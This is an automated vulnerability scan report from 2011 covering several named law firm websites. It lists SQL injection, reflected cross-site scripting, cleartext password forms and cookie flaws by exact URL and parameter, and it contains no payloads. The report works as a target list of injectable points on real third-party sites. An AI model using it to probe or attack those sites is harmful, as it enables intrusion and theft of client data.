Lawyers, Dorks, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in Major Law Firms, Personal Information Loss Risks, Unforgivabile Vulnerabilities, DORKS

Report generated by CloudScan Vulnerability Crawler at Wed Jan 19 16:24:16 CST 2011.



DORK CWE-79 XSS Report

Loading

1. SQL injection

1.1. http://www.ebglaw.com/showoffice.aspx [User-Agent HTTP header]

1.2. http://www.fulbright.com/index.cfm [FUSEACTION parameter]

1.3. http://www.fulbright.com/index.cfm [article_id parameter]

1.4. http://www.fulbright.com/index.cfm [emp_id parameter]

1.5. http://www.fulbright.com/index.cfm [eventID parameter]

1.6. http://www.fulbright.com/index.cfm [fuseaction parameter]

1.7. http://www.fulbright.com/index.cfm [site_id parameter]

2. Cross-site scripting (reflected)

2.1. http://jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

2.2. http://skaddenpractices.skadden.com/fca/ [name of an arbitrarily supplied request parameter]

2.3. http://skaddenpractices.skadden.com/hc/ [name of an arbitrarily supplied request parameter]

2.4. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

2.5. http://skaddenpractices.skadden.com/sec/ [name of an arbitrarily supplied request parameter]

2.6. http://www.arnoldporter.com/practices.cfm [name of an arbitrarily supplied request parameter]

2.7. http://www.arnoldporter.com/practices.cfm [u parameter]

2.8. http://www.arnoldporter.com/publications.cfm [name of an arbitrarily supplied request parameter]

2.9. http://www.cov.com/about_the_firm/firm_history [name of an arbitrarily supplied request parameter]

2.10. http://www.cov.com/balancingworkandfamilylife [name of an arbitrarily supplied request parameter]

2.11. http://www.cov.com/bestviewed [name of an arbitrarily supplied request parameter]

2.12. http://www.cov.com/biographies [name of an arbitrarily supplied request parameter]

2.13. http://www.cov.com/diversityoverview [name of an arbitrarily supplied request parameter]

2.14. http://www.cov.com/diversityupdate [name of an arbitrarily supplied request parameter]

2.15. http://www.cov.com/extranet [name of an arbitrarily supplied request parameter]

2.16. http://www.cov.com/firmoverview [name of an arbitrarily supplied request parameter]

2.17. http://www.cov.com/forum [name of an arbitrarily supplied request parameter]

2.18. http://www.cov.com/honorsrankings [name of an arbitrarily supplied request parameter]

2.19. http://www.cov.com/leadersindiversity [name of an arbitrarily supplied request parameter]

2.20. http://www.cov.com/legalnotices [name of an arbitrarily supplied request parameter]

2.21. http://www.cov.com/mclarty [name of an arbitrarily supplied request parameter]

2.22. http://www.cov.com/news/detail.aspx [name of an arbitrarily supplied request parameter]

2.23. http://www.cov.com/news/detail.aspx [news parameter]

2.24. http://www.cov.com/newsandevents [name of an arbitrarily supplied request parameter]

2.25. http://www.cov.com/offices [name of an arbitrarily supplied request parameter]

2.26. http://www.cov.com/practice [name of an arbitrarily supplied request parameter]

2.27. http://www.cov.com/practice/ [name of an arbitrarily supplied request parameter]

2.28. http://www.cov.com/privacypolicy [name of an arbitrarily supplied request parameter]

2.29. http://www.cov.com/probonooverview [name of an arbitrarily supplied request parameter]

2.30. http://www.cov.com/publications [name of an arbitrarily supplied request parameter]

2.31. http://www.cov.com/recruitingthebestandbrightest [name of an arbitrarily supplied request parameter]

2.32. http://www.cov.com/retainingourdiversetalent [name of an arbitrarily supplied request parameter]

2.33. http://www.cov.com/sitemap [name of an arbitrarily supplied request parameter]

2.34. http://www.cov.com/termsofuse [name of an arbitrarily supplied request parameter]

2.35. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

2.36. http://www.ebglaw.com/showoffice.aspx [name of an arbitrarily supplied request parameter]

2.37. http://www.fulbright.com/index.cfm [eTitle parameter]

2.38. http://www.fulbright.com/index.cfm [eTitle parameter]

2.39. http://www.fulbright.com/index.cfm [fuseaction parameter]

2.40. http://www.fulbright.com/index.cfm [fuseaction parameter]

2.41. http://www.fulbright.com/index.cfm [name of an arbitrarily supplied request parameter]

2.42. http://www.fulbright.com/index.cfm [pf parameter]

2.43. http://www.fulbright.com/index.cfm [rss parameter]

2.44. http://www.jonesdaydiversity.com/ [name of an arbitrarily supplied request parameter]

2.45. http://www.mckennacuneo.com/ [name of an arbitrarily supplied request parameter]

2.46. http://www.skadden.com/2011insights.cfm [name of an arbitrarily supplied request parameter]

2.47. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]

2.48. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

2.49. http://www.weil.com/ [name of an arbitrarily supplied request parameter]

2.50. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]

2.51. http://www.wileyrein.com/css/_blog.css [REST URL parameter 1]

2.52. http://www.wileyrein.com/css/_blog.css [REST URL parameter 2]

2.53. http://www.wileyrein.com/css/_list.css [REST URL parameter 1]

2.54. http://www.wileyrein.com/css/_list.css [REST URL parameter 2]

2.55. http://www.wileyrein.com/css/_main.css [REST URL parameter 1]

2.56. http://www.wileyrein.com/css/_main.css [REST URL parameter 2]

2.57. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 1]

2.58. http://www.wileyrein.com/css/_navMenu.css [REST URL parameter 2]

2.59. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 1]

2.60. http://www.wileyrein.com/css/_navSearch.css [REST URL parameter 2]

2.61. http://www.wileyrein.com/css/_slide.css [REST URL parameter 1]

2.62. http://www.wileyrein.com/css/_slide.css [REST URL parameter 2]

2.63. http://www.wileyrein.com/css/main.css [REST URL parameter 1]

2.64. http://www.wileyrein.com/css/main.css [REST URL parameter 2]

2.65. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 1]

2.66. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 2]

2.67. http://www.wileyrein.com/css/ui/ui.accordion.css [REST URL parameter 3]

2.68. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 1]

2.69. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 2]

2.70. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 3]

2.71. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 1]

2.72. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 2]

2.73. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 3]

2.74. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 1]

2.75. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 2]

2.76. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 3]

2.77. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 1]

2.78. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 2]

2.79. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 3]

2.80. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 1]

2.81. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 2]

2.82. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 3]

2.83. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 1]

2.84. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 2]

2.85. http://www.wileyrein.com/css/ui/ui.progressbar.css [REST URL parameter 3]

2.86. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 1]

2.87. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 2]

2.88. http://www.wileyrein.com/css/ui/ui.resizable.css [REST URL parameter 3]

2.89. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 1]

2.90. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 2]

2.91. http://www.wileyrein.com/css/ui/ui.slider.css [REST URL parameter 3]

2.92. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 1]

2.93. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 2]

2.94. http://www.wileyrein.com/css/ui/ui.tabs.css [REST URL parameter 3]

2.95. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 1]

2.96. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 2]

2.97. http://www.wileyrein.com/css/ui/ui.theme.css [REST URL parameter 3]

2.98. http://www.wileyrein.com/index.cfm [REST URL parameter 1]

2.99. http://www.wileyrein.com/index.cfm [name of an arbitrarily supplied request parameter]

2.100. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 1]

2.101. http://www.wileyrein.com/js/jq.equalheights.js [REST URL parameter 2]

2.102. http://www.wileyrein.com/js/jquery.js [REST URL parameter 1]

2.103. http://www.wileyrein.com/js/jquery.js [REST URL parameter 2]

2.104. http://www.wileyrein.com/js/menu.js [REST URL parameter 1]

2.105. http://www.wileyrein.com/js/menu.js [REST URL parameter 2]

2.106. http://www.wileyrein.com/js/script.js [REST URL parameter 1]

2.107. http://www.wileyrein.com/js/script.js [REST URL parameter 2]

2.108. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 1]

2.109. http://www.wileyrein.com/js/ui.core.js [REST URL parameter 2]

2.110. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 1]

2.111. http://www.wileyrein.com/js/ui.datepicker.js [REST URL parameter 2]

2.112. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 1]

2.113. http://www.wileyrein.com/js/ui.dialog.js [REST URL parameter 2]

2.114. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 1]

2.115. http://www.wileyrein.com/js/ui.draggable.js [REST URL parameter 2]

2.116. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 1]

2.117. http://www.wileyrein.com/js/ui.resizable.js [REST URL parameter 2]

2.118. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 1]

2.119. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 2]

2.120. http://www.wileyrein.com/rss/awards/rss.xml [REST URL parameter 3]

2.121. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 1]

2.122. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 2]

2.123. http://www.wileyrein.com/rss/events/rss.xml [REST URL parameter 3]

2.124. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 1]

2.125. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 2]

2.126. http://www.wileyrein.com/rss/in_the_news/rss.xml [REST URL parameter 3]

2.127. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 1]

2.128. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 2]

2.129. http://www.wileyrein.com/rss/news_releases/rss.xml [REST URL parameter 3]

2.130. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 1]

2.131. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 2]

2.132. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 3]

2.133. http://www.wileyrein.com/rss/practices/Advertising/rss.xml [REST URL parameter 4]

2.134. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 1]

2.135. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 2]

2.136. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 3]

2.137. http://www.wileyrein.com/rss/practices/Antitrust/rss.xml [REST URL parameter 4]

2.138. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 1]

2.139. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 2]

2.140. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 3]

2.141. http://www.wileyrein.com/rss/practices/Appellate/rss.xml [REST URL parameter 4]

2.142. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 1]

2.143. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 2]

2.144. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 3]

2.145. http://www.wileyrein.com/rss/practices/Aviation/rss.xml [REST URL parameter 4]

2.146. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 1]

2.147. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 2]

2.148. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 3]

2.149. http://www.wileyrein.com/rss/practices/Bankruptcy__Financial_Restructuring/rss.xml [REST URL parameter 4]

2.150. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 1]

2.151. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 2]

2.152. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 3]

2.153. http://www.wileyrein.com/rss/practices/Communications/rss.xml [REST URL parameter 4]

2.154. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 1]

2.155. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 2]

2.156. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 3]

2.157. http://www.wileyrein.com/rss/practices/Corporate/rss.xml [REST URL parameter 4]

2.158. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 1]

2.159. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 2]

2.160. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 3]

2.161. http://www.wileyrein.com/rss/practices/Election_Law__Government_Ethics/rss.xml [REST URL parameter 4]

2.162. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 1]

2.163. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 2]

2.164. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 3]

2.165. http://www.wileyrein.com/rss/practices/Employment__Labor/rss.xml [REST URL parameter 4]

2.166. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 1]

2.167. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 2]

2.168. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 3]

2.169. http://www.wileyrein.com/rss/practices/Environment__Safety/rss.xml [REST URL parameter 4]

2.170. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 1]

2.171. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 2]

2.172. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 3]

2.173. http://www.wileyrein.com/rss/practices/Food__Drug_and_Product_Safety/rss.xml [REST URL parameter 4]

2.174. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 1]

2.175. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 2]

2.176. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 3]

2.177. http://www.wileyrein.com/rss/practices/Franchise/rss.xml [REST URL parameter 4]

2.178. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 1]

2.179. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 2]

2.180. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 3]

2.181. http://www.wileyrein.com/rss/practices/Government_Contracts/rss.xml [REST URL parameter 4]

2.182. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 1]

2.183. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 2]

2.184. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 3]

2.185. http://www.wileyrein.com/rss/practices/Health_Care/rss.xml [REST URL parameter 4]

2.186. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 1]

2.187. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 2]

2.188. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 3]

2.189. http://www.wileyrein.com/rss/practices/Insurance/rss.xml [REST URL parameter 4]

2.190. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 1]

2.191. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 2]

2.192. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 3]

2.193. http://www.wileyrein.com/rss/practices/Intellectual_Property/rss.xml [REST URL parameter 4]

2.194. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 1]

2.195. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 2]

2.196. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 3]

2.197. http://www.wileyrein.com/rss/practices/International_Trade/rss.xml [REST URL parameter 4]

2.198. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 1]

2.199. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 2]

2.200. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 3]

2.201. http://www.wileyrein.com/rss/practices/Litigation/rss.xml [REST URL parameter 4]

2.202. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 1]

2.203. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 2]

2.204. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 3]

2.205. http://www.wileyrein.com/rss/practices/Postal/rss.xml [REST URL parameter 4]

2.206. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 1]

2.207. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 2]

2.208. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 3]

2.209. http://www.wileyrein.com/rss/practices/Privacy/rss.xml [REST URL parameter 4]

2.210. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 1]

2.211. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 2]

2.212. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 3]

2.213. http://www.wileyrein.com/rss/practices/Professional_Liability/rss.xml [REST URL parameter 4]

2.214. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 1]

2.215. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 2]

2.216. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 3]

2.217. http://www.wileyrein.com/rss/practices/Public_Policy/rss.xml [REST URL parameter 4]

2.218. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 1]

2.219. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 2]

2.220. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 3]

2.221. http://www.wileyrein.com/rss/practices/White_Collar_Defense/rss.xml [REST URL parameter 4]

2.222. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 1]

2.223. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 2]

2.224. http://www.wileyrein.com/rss/publications/rss.xml [REST URL parameter 3]

2.225. http://www.wileyrein.com/x22 [REST URL parameter 1]

2.226. http://www.wileyrein.com/x22 [name of an arbitrarily supplied request parameter]

2.227. http://www.arnoldporter.com/ [Referer HTTP header]

2.228. http://www.arnoldporter.com/about_the_firm_diversity_our_values.cfm [Referer HTTP header]

2.229. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm [Referer HTTP header]

2.230. http://www.arnoldporter.com/about_the_firm_recognition.cfm [Referer HTTP header]

2.231. http://www.arnoldporter.com/about_the_firm_recognition_rankings.cfm [Referer HTTP header]

2.232. http://www.arnoldporter.com/about_the_firm_who_we_are.cfm [Referer HTTP header]

2.233. http://www.arnoldporter.com/advisory.cfm [Referer HTTP header]

2.234. http://www.arnoldporter.com/careers.cfm [Referer HTTP header]

2.235. http://www.arnoldporter.com/contact.cfm [Referer HTTP header]

2.236. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

2.237. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

2.238. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]

2.239. http://www.arnoldporter.com/global_reach.cfm [Referer HTTP header]

2.240. http://www.arnoldporter.com/globals_disclaimer.cfm [Referer HTTP header]

2.241. http://www.arnoldporter.com/globals_llp_status.cfm [Referer HTTP header]

2.242. http://www.arnoldporter.com/globals_non_discrimination.cfm [Referer HTTP header]

2.243. http://www.arnoldporter.com/globals_operating_status.cfm [Referer HTTP header]

2.244. http://www.arnoldporter.com/globals_privacy_policy.cfm [Referer HTTP header]

2.245. http://www.arnoldporter.com/globals_statement_clients_rights.cfm [Referer HTTP header]

2.246. http://www.arnoldporter.com/home.cfm [Referer HTTP header]

2.247. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]

2.248. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

2.249. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

2.250. http://www.arnoldporter.com/news.cfm [Referer HTTP header]

2.251. http://www.arnoldporter.com/offices.cfm [Referer HTTP header]

2.252. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]

2.253. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]

2.254. http://www.arnoldporter.com/professionals.cfm [Referer HTTP header]

2.255. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]

2.256. http://www.arnoldporter.com/remote_access.cfm [Referer HTTP header]

2.257. http://www.arnoldporter.com/search.cfm [Referer HTTP header]

2.258. http://www.arnoldporter.com/sitemap.cfm [Referer HTTP header]

2.259. http://www.fulbright.com/index.cfm [Referer HTTP header]

3. Cleartext submission of password

3.1. http://www.fulbright.com/

3.2. http://www.fulbright.com/index.cfm

3.3. http://www.fulbright.com/insite

3.4. http://www.fulbright.com/insite

3.5. http://www.political.cov.com/

3.6. http://www.skadden.com/alumni/Index.cfm

4. Session token in URL

5. ASP.NET ViewState without MAC enabled

5.1. http://www.cov.com/

5.2. http://www.cov.com/en-US/regions/middle_east/

5.3. http://www.cov.com/favicon.ico

5.4. http://www.cov.com/health_care/health_care_reform/

5.5. http://www.cov.com/industry/financial_services/dodd_frank/

5.6. http://www.cov.com/ja-JP/practice/region.aspx

5.7. http://www.cov.com/ko-KR/practice/region.aspx

5.8. http://www.cov.com/news/detail.aspx

5.9. http://www.cov.com/practice/

5.10. http://www.cov.com/zh-CN/practice/region.aspx

6. Cookie scoped to parent domain

6.1. http://www.fulbright.com/dc

6.2. http://www.fulbright.com/Austin

6.3. http://www.fulbright.com/Denver

6.4. http://www.fulbright.com/London

6.5. http://www.fulbright.com/LosAngeles

6.6. http://www.fulbright.com/Minneapolis

6.7. http://www.fulbright.com/Riyadh

6.8. http://www.fulbright.com/aboutus

6.9. http://www.fulbright.com/alumni

6.10. http://www.fulbright.com/aop

6.11. http://www.fulbright.com/careers

6.12. http://www.fulbright.com/dc/x22

6.13. http://www.fulbright.com/downloads

6.14. http://www.fulbright.com/dubai

6.15. http://www.fulbright.com/favicon.ico

6.16. http://www.fulbright.com/index.cfm

6.17. http://www.fulbright.com/industries

6.18. http://www.fulbright.com/insite

6.19. http://www.fulbright.com/international

6.20. http://www.fulbright.com/jblount

6.21. http://www.fulbright.com/news/act_ticker_xml.cfm

6.22. http://www.fulbright.com/newsTicker.swf

6.23. http://www.fulbright.com/offices

6.24. http://www.fulbright.com/rss

6.25. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm

6.26. http://www.fulbright.com/technology

7. Cookie without HttpOnly flag set

7.1. http://www.arnoldporter.com/

7.2. http://www.ebglaw.com/showoffice.aspx

7.3. http://www.fulbright.com/

7.4. http://www.fulbright.com/dc

7.5. http://www.fulbright.com/index.cfm

7.6. http://www.political.cov.com/

7.7. http://www.wileyrein.com/

7.8. http://jonesdaydiversity.com/

7.9. http://jonesdaydiversity.com/404.aspx

7.10. http://jonesdaydiversity.com/favicon.ico

7.11. http://skaddenpractices.skadden.com/fca/

7.12. http://skaddenpractices.skadden.com/hc/

7.13. http://skaddenpractices.skadden.com/sec/

7.14. http://skaddenpractices.skadden.com/sec/scripts/resize.gif

7.15. http://www.cov.com/

7.16. http://www.cov.com/en-US/regions/middle_east/

7.17. http://www.cov.com/favicon.ico

7.18. http://www.cov.com/health_care/health_care_reform/

7.19. http://www.cov.com/industry/financial_services/dodd_frank/

7.20. http://www.cov.com/ja-JP/practice/region.aspx

7.21. http://www.cov.com/ko-KR/practice/region.aspx

7.22. http://www.cov.com/news/detail.aspx

7.23. http://www.cov.com/practice/

7.24. http://www.cov.com/zh-CN/practice/region.aspx

7.25. http://www.fulbright.com/Austin

7.26. http://www.fulbright.com/Beijing

7.27. http://www.fulbright.com/Dallas

7.28. http://www.fulbright.com/Denver

7.29. http://www.fulbright.com/FAA_adv

7.30. http://www.fulbright.com/HongKong

7.31. http://www.fulbright.com/London

7.32. http://www.fulbright.com/LosAngeles

7.33. http://www.fulbright.com/Minneapolis

7.34. http://www.fulbright.com/Munich

7.35. http://www.fulbright.com/Riyadh

7.36. http://www.fulbright.com/SanAntonio

7.37. http://www.fulbright.com/StLouis

7.38. http://www.fulbright.com/aboutus

7.39. http://www.fulbright.com/alumni

7.40. http://www.fulbright.com/aop

7.41. http://www.fulbright.com/careers

7.42. http://www.fulbright.com/dc/x22

7.43. http://www.fulbright.com/downloads

7.44. http://www.fulbright.com/dubai

7.45. http://www.fulbright.com/favicon.ico

7.46. http://www.fulbright.com/houston

7.47. http://www.fulbright.com/industries

7.48. http://www.fulbright.com/insite

7.49. http://www.fulbright.com/international

7.50. http://www.fulbright.com/jblount

7.51. http://www.fulbright.com/languages

7.52. http://www.fulbright.com/news/act_ticker_xml.cfm

7.53. http://www.fulbright.com/newsTicker.swf

7.54. http://www.fulbright.com/newyork

7.55. http://www.fulbright.com/offices

7.56. http://www.fulbright.com/rss

7.57. http://www.fulbright.com/seminars/act_eventbanner_xml.cfm

7.58. http://www.fulbright.com/technology

7.59. http://www.jonesdaydiversity.com/

7.60. http://www.skadden.com/2011insights.cfm

7.61. http://www.skadden.com/alumni/Index.cfm

7.62. http://www.skadden.com/index.cfm

7.63. http://www.weil.com/

8. Password field with autocomplete enabled

8.1. http://www.fulbright.com/

8.2. http://www.fulbright.com/index.cfm

8.3. http://www.fulbright.com/insite

8.4. http://www.fulbright.com/insite

8.5. http://www.political.cov.com/

8.6. http://www.skadden.com/alumni/Index.cfm

9. Cross-domain Referer leakage

9.1. http://skaddenpractices.skadden.com/sec/index.php

9.2. http://www.arnoldporter.com/events.cfm

9.3. http://www.arnoldporter.com/multimedia.cfm

9.4. http://www.arnoldporter.com/publications.cfm

9.5. http://www.ebglaw.com/showoffice.aspx

9.6. http://www.fulbright.com/index.cfm

9.7. http://www.fulbright.com/index.cfm

9.8. http://www.skadden.com/2011insights.cfm

9.9. http://www.skadden.com/alumni/Index.cfm

9.10. http://www.skadden.com/index.cfm

10. Cross-domain script include

10.1. http://www.ebglaw.com/404.aspx

10.2. http://www.ebglaw.com/showoffice.aspx

10.3. http://www.skadden.com/

10.4. http://www.skadden.com/2011insights.cfm

10.5. http://www.skadden.com/alumni/Index.cfm

10.6. http://www.skadden.com/index.cfm

10.7. http://www.weil.com/

10.8. http://www.wileyrein.com/

10.9. http://www.wileyrein.com/index.cfm

10.10. http://www.wileyrein.com/x22

11. Email addresses disclosed

11.1. http://skaddenpractices.skadden.com/fca/

11.2. http://skaddenpractices.skadden.com/hc/

11.3. http://skaddenpractices.skadden.com/sec/index.php

11.4. http://www.arnoldporter.com/about_the_firm_pro_bono_our_commitment.cfm

11.5. http://www.arnoldporter.com/events.cfm

11.6. http://www.arnoldporter.com/globals_privacy_policy.cfm

11.7. http://www.cov.com/en-US/regions/middle_east/

11.8. http://www.cov.com/health_care/health_care_reform/

11.9. http://www.cov.com/industry/financial_services/dodd_frank/

11.10. http://www.cov.com/ja-JP/practice/region.aspx

11.11. http://www.cov.com/ko-KR/practice/region.aspx

11.12. http://www.cov.com/zh-CN/practice/region.aspx

11.13. http://www.ebglaw.com/js/jquery.mousewheel.js

11.14. http://www.ebglaw.com/showoffice.aspx

11.15. http://www.fulbright.com/aop

11.16. http://www.fulbright.com/fjLib/js/prototype.js

11.17. http://www.fulbright.com/index.cfm

11.18. http://www.fulbright.com/industries

11.19. http://www.political.cov.com/

11.20. http://www.skadden.com/Index.cfm

11.21. http://www.wileyrein.com/js/script.js

12. HTML does not specify charset

12.1. http://skaddenpractices.skadden.com/

12.2. http://skaddenpractices.skadden.com/sec/images/tools_doc.gif

12.3. http://skaddenpractices.skadden.com/sec/images/tools_mail.gif

12.4. http://skaddenpractices.skadden.com/sec/images/tools_phone.gif

12.5. http://skaddenpractices.skadden.com/sec/scripts/resize.gif

12.6. http://www.fulbright.com/index.cfm

13. HTML uses unrecognised charset

13.1. http://www.ebglaw.com/404.aspx

13.2. http://www.ebglaw.com/showoffice.aspx

14. Content type incorrectly stated

14.1. http://www.arnoldporter.com//images/iTunesButton.jpg

14.2. http://www.fulbright.com/index.cfm



1. SQL injection  next
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

